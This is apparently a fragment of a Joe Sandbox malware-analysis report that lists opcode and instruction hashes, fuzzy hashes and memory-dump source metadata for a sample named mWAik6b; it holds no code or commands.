                          • String ID:
                          • API String ID:
                          • Opcode ID: 44de9344a8ec85b3e62cebc475114d058cab0bf88f274ae7e3ce832fdfb68485
                          • Instruction ID: 0ba60b1a6b58bf4df5f17778f38ca91283670e5b68f6490ca0d226350d342e25
                          • Opcode Fuzzy Hash: 44de9344a8ec85b3e62cebc475114d058cab0bf88f274ae7e3ce832fdfb68485
                          • Instruction Fuzzy Hash: BFD1143AB9C311CFD308CF68D88152AB7E2FBCA314F09897DD98587391D675E8118B85
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ecf4a3106072b0c00937b6ebf450f7c79a12097b872ba243478e856f5c426876
                          • Instruction ID: 09c23702fc9c386252fe9f66b8cefd1b755a717c9ff45e488c50c6ac5a3e3af2
                          • Opcode Fuzzy Hash: ecf4a3106072b0c00937b6ebf450f7c79a12097b872ba243478e856f5c426876
                          • Instruction Fuzzy Hash: D0D1133AB983108FD308CF79D88112AB7E2FBCA304F09897DD98587391E675D8118B85
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 929fbec960f4e757a2e9346110c54a28fff78d4d5c99794debd797fa9777b9bf
                          • Instruction ID: 91bdc48acee607aa513b8b8a817f5b7569988e5fbf857876db242e7a3c890cd6
                          • Opcode Fuzzy Hash: 929fbec960f4e757a2e9346110c54a28fff78d4d5c99794debd797fa9777b9bf
                          • Instruction Fuzzy Hash: D0D1CB7520C3208BC710CF68E85266BB7F2EF96324F544A1EE8D68B391E3789915C75B
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 706edc3a786295cd9b7db35b8e16aa02d11b2287f3acf26f8c1a695ff84f42ae
                          • Instruction ID: bd11b9b353075b0f243e2a8d2cec7a69c64413b4f3189328fecfefeeb83d66f0
                          • Opcode Fuzzy Hash: 706edc3a786295cd9b7db35b8e16aa02d11b2287f3acf26f8c1a695ff84f42ae
                          • Instruction Fuzzy Hash: 95F1E0356087418FD724DF29C88066BFBE6EFD9304F08882EE5D587791E679E804CB5A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8de06b941569b25121864c47a18deba64b799c2f9a9fd41fa35bbcd010699ae1
                          • Instruction ID: cf98daa6b0f244037b519114af1016d266dc8de72cb4eec0945ede4351f9fb60
                          • Opcode Fuzzy Hash: 8de06b941569b25121864c47a18deba64b799c2f9a9fd41fa35bbcd010699ae1
                          • Instruction Fuzzy Hash: 0C02CD71604B808FD3118B3DC841392FFE5AF56214F1CC9ADE0EACB786C639E5068B96
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0bc3a15889f038c3be904945fa4307770efde39777cfbb29d9de12fae0a666a6
                          • Instruction ID: 981720bf448ef16233a647ad7a4ec1f4ccac6d4104e44bbfca1b5789e973b0d2
                          • Opcode Fuzzy Hash: 0bc3a15889f038c3be904945fa4307770efde39777cfbb29d9de12fae0a666a6
                          • Instruction Fuzzy Hash: 7702EDF1905B40BFD3A1CF2AC942793BEEDEB4A360F14491EF5AEC3250D63565018BA6
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 11e54cd9592d80c26b164e69f234894c548078e08a45b5b33557890051a6d0bf
                          • Instruction ID: 63a3953ce4b3b740e35673679f7b49c088a91cd7b948d84169041383d4445028
                          • Opcode Fuzzy Hash: 11e54cd9592d80c26b164e69f234894c548078e08a45b5b33557890051a6d0bf
                          • Instruction Fuzzy Hash: 31027E31208B808FE319CB39C454762BFE1AB56218F1CCAADD5EACB3D3D52AD546CB51
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3552ec52e14b5f29a6ea45c0baa5a54f8179e16b037b33f2a74ad24278b2191
                          • Instruction ID: 85d682ba9d0e738d764f2cee7df0d08f4dfff2c3b0d01328fb96363968d22b78
                          • Opcode Fuzzy Hash: f3552ec52e14b5f29a6ea45c0baa5a54f8179e16b037b33f2a74ad24278b2191
                          • Instruction Fuzzy Hash: D1D15B71A087644FC725CF28D89172FBBE2AFC5304F49867DD8958B386DB39A804C786
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41e169f84d22c2e20683df8e5ac09edef0eb259c98c15b911fa5faa88d6b8661
                          • Instruction ID: 324b346f91895984a308dcba309f118db5c0af46137feb4eed633487395ba9e5
                          • Opcode Fuzzy Hash: 41e169f84d22c2e20683df8e5ac09edef0eb259c98c15b911fa5faa88d6b8661
                          • Instruction Fuzzy Hash: E5F1D421204B808FC315CB3DC5153A6FFE26FA6214F1DC5ADC1EACBB87D969E4028756
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7888c1b26d4de82882cc6e15dfa0250c9bc15c2993bc06a4174a43a69f047b43
                          • Instruction ID: 9e69d216e5a1eaa4e23c8cd1891d08ab4e70943362203a16a754534acd1fb262
                          • Opcode Fuzzy Hash: 7888c1b26d4de82882cc6e15dfa0250c9bc15c2993bc06a4174a43a69f047b43
                          • Instruction Fuzzy Hash: ABC128755443019FE7108F24DC81B5BBBE2BFD4324F148A2EF498A33A1E7399C548B4A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 972b6272332e9452efad07e6f3fcb8728bd7bb2f8e219bac03db41ad7582d963
                          • Instruction ID: e09d01570dee6469479a60366f030694f77ac5cc107bd8cc820924351c492424
                          • Opcode Fuzzy Hash: 972b6272332e9452efad07e6f3fcb8728bd7bb2f8e219bac03db41ad7582d963
                          • Instruction Fuzzy Hash: 8CA18CB9A00200DFD7109F24EC8162373B2FF56314B19457EE9468F3AAEB39E851CB56
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f344cdce8dbe425f87edba1759d3a8e74b836352d67987f8d7050ac33bbf7f0
                          • Instruction ID: 819c9d3e455e9ca9e1a26ced51d0c04dd86d4dddb7007db75df293ecbae52cbc
                          • Opcode Fuzzy Hash: 6f344cdce8dbe425f87edba1759d3a8e74b836352d67987f8d7050ac33bbf7f0
                          • Instruction Fuzzy Hash: 45D1D676605B818FC3158B3CC895296BFE2AF9A324F1CC66CD5EA873D6D738A409C711
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05437df602dc57edd95d2a5d4231048cbcefe00e6ea43abd62f39208546a0616
                          • Instruction ID: 97f4e151f9c25dfe3186007eb39d18d7fab623bcc53f9acc6658cb94748d1cb3
                          • Opcode Fuzzy Hash: 05437df602dc57edd95d2a5d4231048cbcefe00e6ea43abd62f39208546a0616
                          • Instruction Fuzzy Hash: 8DC16CB29087418FC360CF28DC86BABB7E1BF85318F09493DD1DAD6242E778A155CB46
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5aa5378d630d6f57637fb44b6a8956afe8125603b842f223fcf3fea132f00252
                          • Instruction ID: 68284c010b80cdfe13a4e3cd76a4d632090cc4e85ebef30f3599e3bf9ccc70ca
                          • Opcode Fuzzy Hash: 5aa5378d630d6f57637fb44b6a8956afe8125603b842f223fcf3fea132f00252
                          • Instruction Fuzzy Hash: FAC11736609B818FC3158F3CC4952A6BFE2AF9A320F1DC6ADD5EA8B3D2D6349405C711
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e4504ddb6b9124a10d57000d61d6bbe215923a675a8a9e8c91ecf6e6c0166295
                          • Instruction ID: 02bba17ff1a76ede1ee327d3bc9e298b3db4afb739480289d299968b4f3590e3
                          • Opcode Fuzzy Hash: e4504ddb6b9124a10d57000d61d6bbe215923a675a8a9e8c91ecf6e6c0166295
                          • Instruction Fuzzy Hash: 24A1C875240B00DFD724CF24DC81BA677A2FB9A314F2AC569D09A8B3A5D734AC52CB19
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d54aa694d4a16e7310f2f4cb26cc58cb9ec31ee0d195ac9d1797f50aea24eb30
                          • Instruction ID: 80e227f616da099ea6ca07ff6917ce1ac0c493840e69eb0515369c68d16ea0e1
                          • Opcode Fuzzy Hash: d54aa694d4a16e7310f2f4cb26cc58cb9ec31ee0d195ac9d1797f50aea24eb30
                          • Instruction Fuzzy Hash: 7AA12675A09391CFE310CF28D88032ABBE2AF8A310F198A7DE595973A1C735DD42CB55
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
                          • Instruction ID: 19833f6a1940e23ff807266a8d8c513eb4ba143357f96d908e268e99486f71cf
                          • Opcode Fuzzy Hash: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
                          • Instruction Fuzzy Hash: 2B516EB15087548FE314DF29D89535BBBE1BBC8318F044A2EE5D987391E379DA088F86
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c3eec87fe2e6b3535f62e8ee31a74f448a17c5f8e3076b45f860c3c691a9f1f5
                          • Instruction ID: 2806a6c60dcdade9a109e4eb1c266c37354aedd9af97f0a0e670afd14067213f
                          • Opcode Fuzzy Hash: c3eec87fe2e6b3535f62e8ee31a74f448a17c5f8e3076b45f860c3c691a9f1f5
                          • Instruction Fuzzy Hash: 9441E7756047018BC7248F29C8917B3B7F2FF59314B18856EE4A68B391D738A881C795
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d03022e425d95beae91a25d272ca4f6360437e781e0849ebc759fd24edffb9d2
                          • Instruction ID: fd6f88aa68ca247b4587f7d1a9460dff540b792afa44ed99840666eaceb16a5d
                          • Opcode Fuzzy Hash: d03022e425d95beae91a25d272ca4f6360437e781e0849ebc759fd24edffb9d2
                          • Instruction Fuzzy Hash: FC414673E501214BDB28CF7D8C915ABB7A2ABDA22472E973DC492E7385DE344C068784
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc6cad57557abe31136d55441872bcab2133162b111c729cacc7777c3a599b3b
                          • Instruction ID: 5ff92c29d49302e8313681921d8cd02e517ed759288c269039d7e8940e5562aa
                          • Opcode Fuzzy Hash: bc6cad57557abe31136d55441872bcab2133162b111c729cacc7777c3a599b3b
                          • Instruction Fuzzy Hash: 86418B33B1835146D324897D88862B6EAD79BDA218B2DC27BE894CB3C5D17D8C86C359
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ffb9c7f2234e9b79d7763f2540d9a94b6f46891398e437f70369f30d97da0caf
                          • Instruction ID: 5cac35742c8906132d4c45ba7911dd0e7eac876e748dd722ceb3a2fb0f07a45f
                          • Opcode Fuzzy Hash: ffb9c7f2234e9b79d7763f2540d9a94b6f46891398e437f70369f30d97da0caf
                          • Instruction Fuzzy Hash: 4F41017290C3428BD310DF66C880267BBE2EBC8305F19C86EE4D49B2A5DB7889458B85
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 103bdf9d32906bd66de4c778210ec413147c27b42e6dd4d3cbd85224b3903efe
                          • Instruction ID: f44053d7b12ca113623aac6385a12357a13e9c962bfbc8cf25868e0ee12bc4fb
                          • Opcode Fuzzy Hash: 103bdf9d32906bd66de4c778210ec413147c27b42e6dd4d3cbd85224b3903efe
                          • Instruction Fuzzy Hash: CF413F75D042109BD7159F29EC8072BB761EF8E734F19A62ED5A4173E4C334AC16CB89
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: dfee9a34708fe61651fa85a302dbcbf01428207896a3995ae0549a342fc45088
                          • Instruction ID: 11bb7442db83790db6d842433c9ea8d7d07d87c748064deb490185fede0f4dee
                          • Opcode Fuzzy Hash: dfee9a34708fe61651fa85a302dbcbf01428207896a3995ae0549a342fc45088
                          • Instruction Fuzzy Hash: CD319771A04300BBE714AB20EC41B3BB7A4EF8570CF04552EFA8593291E334EC00869A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4744187877c6efeb510b13592ddead2cee382e8e4633dd8572f22e8f4e2bb84
                          • Instruction ID: 37b15c1930fbe6cc6bedd2c66aa6a3ce0f2d803f6c7ae847a82093f6cd115eda
                          • Opcode Fuzzy Hash: f4744187877c6efeb510b13592ddead2cee382e8e4633dd8572f22e8f4e2bb84
                          • Instruction Fuzzy Hash: 4F318633A218114BE754CA29CD0469632939BD9328F3E86B99465DF6D7CD3B9D038680
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4e750f3f9cce3696d4a3d9b01105145935509a0bd1e51bb83504ecd39ae5e96
                          • Instruction ID: 9644d87cc07368134b956aa193e6db3e49d081c9a67959cb173bd34305119a66
                          • Opcode Fuzzy Hash: a4e750f3f9cce3696d4a3d9b01105145935509a0bd1e51bb83504ecd39ae5e96
                          • Instruction Fuzzy Hash: 7C21B472A196208BC3149F25D91126BF3F2EFC2311F0A8A59E5D59B391E7389C01D79A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9eb0040deae28d6bf8de72e45909e4788fb5c4842425c4d77390620ac4ab318a
                          • Instruction ID: 1db67a16e133031d4f094625fbe9f8921e97f2ed6c50270e591cc6c9cdf2cf82
                          • Opcode Fuzzy Hash: 9eb0040deae28d6bf8de72e45909e4788fb5c4842425c4d77390620ac4ab318a
                          • Instruction Fuzzy Hash: 4821DB7111C341DAE304EF29D8A092BB7F1EF96354F049A6CF4D6AB690E3788504CB1E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1153db9a7a22f48ddaf1b4f032c561a98daf836014eb502ed475dbf98c7a6e6
                          • Instruction ID: a6084b73f2e2f37e23510124a2b3c12ccf1f7bb22b005b62269b2f1384aae6aa
                          • Opcode Fuzzy Hash: c1153db9a7a22f48ddaf1b4f032c561a98daf836014eb502ed475dbf98c7a6e6
                          • Instruction Fuzzy Hash: C7119B367583108EC720CB26DDC5EAAF7D6EBD2315F09C12BF4941B195C1789884C326
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                          • Instruction ID: e7c1341c9e6cd4b2317ab60107a228ebae25551ccfbb15703da9790e075ec5ee
                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                          • Instruction Fuzzy Hash: 2511E973A091D44EC3268D3C8401565BFA30AA7235F6993DAF4F89B2D2D6268D8B8359
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 314c65e36146cd711e5616bc2876eb5d37b6a881a3064cbcf58d8b6cf9e018f6
                          • Instruction ID: dbc86e69b3454caeb73afdee2edfbb9ab233688b315c80ef64155bf17bd428b8
                          • Opcode Fuzzy Hash: 314c65e36146cd711e5616bc2876eb5d37b6a881a3064cbcf58d8b6cf9e018f6
                          • Instruction Fuzzy Hash: 83019EB1B1031157DA20AE15A4C1B27A3A9AF8070CF08443EE8185B342EB79FC44C6EA
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 56765ce72c551aa9a084b8602c96a4ee933577ad48238e6e7a456a964e29922c
                          • Instruction ID: cd4dcd42ec27cfe7a0226a0ba0c4dd782a608233812f5217b17dba467f853c70
                          • Opcode Fuzzy Hash: 56765ce72c551aa9a084b8602c96a4ee933577ad48238e6e7a456a964e29922c
                          • Instruction Fuzzy Hash: 8221E4B29193908FC314CF29C94015BFBE7ABD9354F168E1DE4D46B694D771C8028F86
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bca4338740fdd6c4ffbe23628e80e1bd2489841d8a16e1da17b44cc6a789625
                          • Instruction ID: 99028c99b5c927184213efd57407d2dcbc29bcb9e8d1c9607bf734db8e94fb7e
                          • Opcode Fuzzy Hash: 4bca4338740fdd6c4ffbe23628e80e1bd2489841d8a16e1da17b44cc6a789625
                          • Instruction Fuzzy Hash: CD01DB74750110DFE7298F14FC90A377352EB46715FDA462ED0A6221B0E3346C21959E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f60826a5c108731956e25c5a1e033d45152dc45506eb80abfcb27fc2b29cf926
                          • Instruction ID: b3f8729b99c7e3804e86efe5872578399fbadebf8bd95321bc98dae1e3bfcace
                          • Opcode Fuzzy Hash: f60826a5c108731956e25c5a1e033d45152dc45506eb80abfcb27fc2b29cf926
                          • Instruction Fuzzy Hash: 2801DF706046838FE7118F298410773FBA4AF23350F18A699C4D6CF392DA389886CB68
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 916dcb65a10122d7949faac8609d57a738aa8459e74d4253fca38cdc15a1bb50
                          • Instruction ID: 4f3878ebba071c3dc1f5309b21a11a03703f802f4337331099df4c6b80f0c05f
                          • Opcode Fuzzy Hash: 916dcb65a10122d7949faac8609d57a738aa8459e74d4253fca38cdc15a1bb50
                          • Instruction Fuzzy Hash: 74F0F9B6944208ABD3145F06FC40E37B36DEF8F768F15131AF598132A1E322ED2197A9
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 531cdd58decae4d9a4c4f27ac2e474779be37447b44434e7daeb645bb0807563
                          • Instruction ID: 9ce3e12eb0a7f281baba32877e35be36dadab8860417ace1400533727192730f
                          • Opcode Fuzzy Hash: 531cdd58decae4d9a4c4f27ac2e474779be37447b44434e7daeb645bb0807563
                          • Instruction Fuzzy Hash: C6F02B3A75421707E310DDA9DCC4527F3E6D7C5614B18403EE984E3380D4B9F8028198
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e55df2ee1e8df3048ead95107212740c6c2cb92b4a9caf2cb34914cccc6b009e
                          • Instruction ID: 5ece43bef9911ef2b35d314bad60919e09cb960a04b58ea56693e566efcf0696
                          • Opcode Fuzzy Hash: e55df2ee1e8df3048ead95107212740c6c2cb92b4a9caf2cb34914cccc6b009e
                          • Instruction Fuzzy Hash: D7F04C33B040100BE704DA3DEC246ABB7D7DBC6210F0E8679C946DB698D5349402C280
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0031ef8c0e0e45d4bbb30685fbc5a7f51781d027ba8dac0b6f08e8d6a94d59dd
                          • Instruction ID: d46bbed883f56801a8acdf6f04d97aff90575ad5029f493e343112b2747ef36f
                          • Opcode Fuzzy Hash: 0031ef8c0e0e45d4bbb30685fbc5a7f51781d027ba8dac0b6f08e8d6a94d59dd
                          • Instruction Fuzzy Hash: 32F0F678A002009FE7089B18DC41B36B271FB8A324F58473DE496A32E5D734AC128A0D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                          • Instruction ID: bb1738f77420eab7453f5858bc2a10adfd274667c215a0af47b576d3ea2b9bd7
                          • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                          • Instruction Fuzzy Hash: CAD0A775A487A10E5758CE3944A04B7FBE8E947612B18589FE8D1E3205D225EC42869C
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 06e406ce6dfd22121a39c3672ce483386d50acaf7d1ded9e6e8226c170f06dd1
                          • Instruction ID: 94104ea360529fa26c88484afaa6156c3b1c44c0b9bddb771427dc7ce3ca1045
                          • Opcode Fuzzy Hash: 06e406ce6dfd22121a39c3672ce483386d50acaf7d1ded9e6e8226c170f06dd1
                          • Instruction Fuzzy Hash: C6D05B35A1A112C781117B50F88143E72305B9775CF4415BFD08522269EF38B906854F
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a07908245abafecf1328235fb540c2fb0e45efe1de0d8a40c1569c09169474d6
